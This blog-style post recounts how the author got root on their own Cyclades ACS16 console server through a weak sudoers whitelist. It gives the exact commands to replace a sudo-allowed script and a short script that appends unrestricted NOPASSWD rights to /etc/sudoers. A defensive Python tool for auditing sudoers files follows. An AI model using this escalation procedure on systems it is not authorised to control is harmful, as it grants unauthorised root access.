At work we have a Cyclades ACS16 console server (running Cyclades-ACS16-Linux V_3.2.0 (Jan/04/08)). While the docs claim all sorts of LDAP features, there’s nothing (either in the web GUI or the CLI configuration tool) to set up LDAP with TLS or required group membership. I tried modifying the /etc/ldap.conf and /etc/nsswitch.conf files, running saveconf and runconf and even rebooting, but no luck. It was apparent that I needed root on the box. Unfortunately, they don’t give you root, and their sudo command is locked down. But, I figured, if sudo would let me chown and cat and mv (enough to switch out the ldap.conf and nsswitch.conf files), root should be pretty easy.

The failing of Cyclades’ sudo lockdown is that it allows sudo execution of a few random shell scripts, and also allows `mv`.

The /etc/sudoers:

# sudoers file.
#
# This file MUST be edited with the 'visudo' command as root.
#
# See the sudoers man page for the details on how to write a sudoers file.
#

# User alias specification

# Runas alias specification

# Host alias specification

# Cmnd alias specification
Cmnd_Alias     SH_CMDS = /bin/cp, \
                        /bin/chown, \
                        /bin/egrep, \
                        /bin/grep, \
                        /bin/cat, \
                        /bin/tar, \
                        /bin/kill, \
                        /bin/mkdir, \
                        /bin/mv, \
                        /bin/rm, \
                        /bin/sed, \
                        /bin/touch, \
                        /sbin/reboot, \
                        /usr/bin/killall, \
                        /usr/bin/w, \
                        /bin/w_cas, \
                        /bin/sess_mngt, \
                        /sbin/route, \
                        /bin/what

Cmnd_Alias     CONF_FILES = /bin/vi /etc/network/st_routes, \
                           /bin/vi /etc/portslave/pslave.conf, \
                           /bin/vi /etc/resolv.conf

Cmnd_Alias     APPLICATIONS = /bin/pmCommand, \
                             /bin/saveconf, \
                             /bin/restoreconf, \
                             /bin/runconf, \
                             /bin/daemon.sh, \
                             /bin/manageService.sh, \
                             /bin/dsviewKillAdmin, \
                             /bin/pmfwupgrade, \
                             /bin/adsap2_clear, \
                             /bin/upgrade_power.sh, \
                             /bin/signal_ras

# User privilege specification
# root can run any command on any host as any user.
root    ALL = (ALL) ALL

# admin user group command specification.
%admin      ALL = NOPASSWD: SH_CMDS, CONF_FILES, APPLICATIONS

So, /bin/upgrade_power.sh doesn’t look like we’re using it too much. Here’s our root procedure. Before doing this, create the /home/admin/foo.sh script.

sudo cp /bin/upgrade_power.sh /bin/upgrade_power.sh.SAVE
sudo chown root:root /home/admin/foo.sh
sudo mv /home/admin/foo.sh /bin/upgrade_power.sh
sudo /bin/upgrade_power.sh
sudo cat /etc/sudoers # just to verify that it worked
sudo mv /bin/upgrade_power.sh.SAVE /bin/upgrade_power.sh # set things back to the way they were

And the key to all of it is the simple /home/admin/foo.sh script:

#!/bin/bash

chmod u+w /etc/sudoers
echo "%admin      ALL = NOPASSWD: ALL" >> /etc/sudoers
chmod u-w /etc/sudoers

That’s it!
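The lesson for anyone maintaining a sudoers whitelist is the one the post demonstrates: a root-run `mv`, `cp` or `chown` makes every other entry in the same rule replaceable, so the rest of the list is decoration. The script below is an added example, not part of the post and not a Cyclades tool. It parses the alias and privilege lines of a sudoers file (backslash line continuations assumed, since that is the only syntax sudoers accepts for the layout shown above), expands the `Cmnd_Alias` names, and reports three classes of weak entry: generic file-writing binaries, editors (which can spawn subprocesses), and scripts that sit in a rule alongside a file writer. `WEAK_SUDOERS` is a constructed, trimmed copy of the file quoted in the post; `HARDENED_SUDOERS` is a constructed variant that keeps only the vendor scripts. The `FILE_WRITERS` and `EDITORS` sets are my own classification, not anything from sudo.

```python
import os
import re

# Constructed sample: the alias and privilege lines of the Cyclades sudoers
# quoted in the post, trimmed to a few entries (backslash continuations assumed).
WEAK_SUDOERS = r"""
# Cmnd alias specification
Cmnd_Alias     SH_CMDS = /bin/cp, \
                        /bin/chown, \
                        /bin/cat, \
                        /bin/mv, \
                        /sbin/reboot

Cmnd_Alias     CONF_FILES = /bin/vi /etc/network/st_routes, \
                           /bin/vi /etc/resolv.conf

Cmnd_Alias     APPLICATIONS = /bin/saveconf, \
                             /bin/upgrade_power.sh

root    ALL = (ALL) ALL
%admin      ALL = NOPASSWD: SH_CMDS, CONF_FILES, APPLICATIONS
"""

# Constructed hardened variant: the generic file-manipulation binaries and the
# editors are gone, leaving only the vendor scripts. This only holds if the
# directory those scripts live in is not writable by the admin group.
HARDENED_SUDOERS = r"""
Cmnd_Alias     APPLICATIONS = /bin/saveconf, \
                             /bin/upgrade_power.sh
root    ALL = (ALL) ALL
%admin      ALL = NOPASSWD: APPLICATIONS
"""

# Binaries that, run as root, let the caller overwrite or replace any file.
FILE_WRITERS = {"mv", "cp", "chown", "chmod", "sed", "tar", "touch", "rm", "mkdir"}
# Editors can spawn subprocesses and write files other than the one named.
EDITORS = {"vi", "vim", "nano", "ed"}


def join_continuations(text):
    """Merge backslash-continued lines and drop blanks and comments."""
    merged, buf = [], ""
    for raw in text.splitlines():
        stripped = raw.rstrip()
        if stripped.endswith("\\"):
            buf += stripped[:-1] + " "
            continue
        buf += raw
        merged.append(buf.strip())
        buf = ""
    if buf.strip():
        merged.append(buf.strip())
    return [line for line in merged if line and not line.startswith("#")]


def parse_sudoers(text):
    """Return (cmnd_aliases, user_specs) for the subset of sudoers syntax used here."""
    aliases, specs = {}, []
    for line in join_continuations(text):
        m = re.match(r"Cmnd_Alias\s+(\w+)\s*=\s*(.*)", line)
        if m:
            aliases[m.group(1)] = [c.strip() for c in m.group(2).split(",") if c.strip()]
            continue
        # user host = (runas) TAG: cmd, cmd, ...
        m = re.match(r"(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\)\s*)?((?:\w+:\s*)*)(.*)", line)
        if m:
            user, host, runas, tags, cmds = m.groups()
            specs.append({
                "user": user, "host": host, "runas": runas or "root",
                "nopasswd": "NOPASSWD" in tags,
                "cmds": [c.strip() for c in cmds.split(",") if c.strip()],
            })
    return aliases, specs


def expand(tokens, aliases, seen=frozenset()):
    """Recursively replace alias names with the commands they stand for."""
    out = []
    for tok in tokens:
        if tok in aliases and tok not in seen:
            out.extend(expand(aliases[tok], aliases, seen | {tok}))
        else:
            out.append(tok)
    return out


def audit(text):
    """Flag (user, command, reason) triples that undermine a command whitelist."""
    aliases, specs = parse_sudoers(text)
    findings = []
    for spec in specs:
        cmds = expand(spec["cmds"], aliases)
        names = {os.path.basename(c.split()[0]) for c in cmds}
        has_writer = bool(names & FILE_WRITERS)
        for c in cmds:
            name = os.path.basename(c.split()[0])
            if name in FILE_WRITERS:
                findings.append((spec["user"], c, "file-writer"))
            elif name in EDITORS:
                findings.append((spec["user"], c, "editor"))
            elif has_writer and c.endswith(".sh"):
                # With a root-run mv/cp in the same rule every other entry is
                # replaceable; the .sh test only highlights the obvious scripts.
                findings.append((spec["user"], c, "replaceable-script"))
    return findings


if __name__ == "__main__":
    for user, cmd, reason in audit(WEAK_SUDOERS):
        print(f"{reason:19} {user:8} {cmd}")
    print("hardened findings:", audit(HARDENED_SUDOERS))
```

Run against the weak file it reports `cp`, `chown` and `mv` as file writers, both `vi` entries as editors, and `/bin/upgrade_power.sh` as a replaceable script; the hardened file produces no findings. The `.sh` heuristic is deliberately narrow: a real audit would `stat` every listed path and treat any file or parent directory writable by the granted user as the same class of finding.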
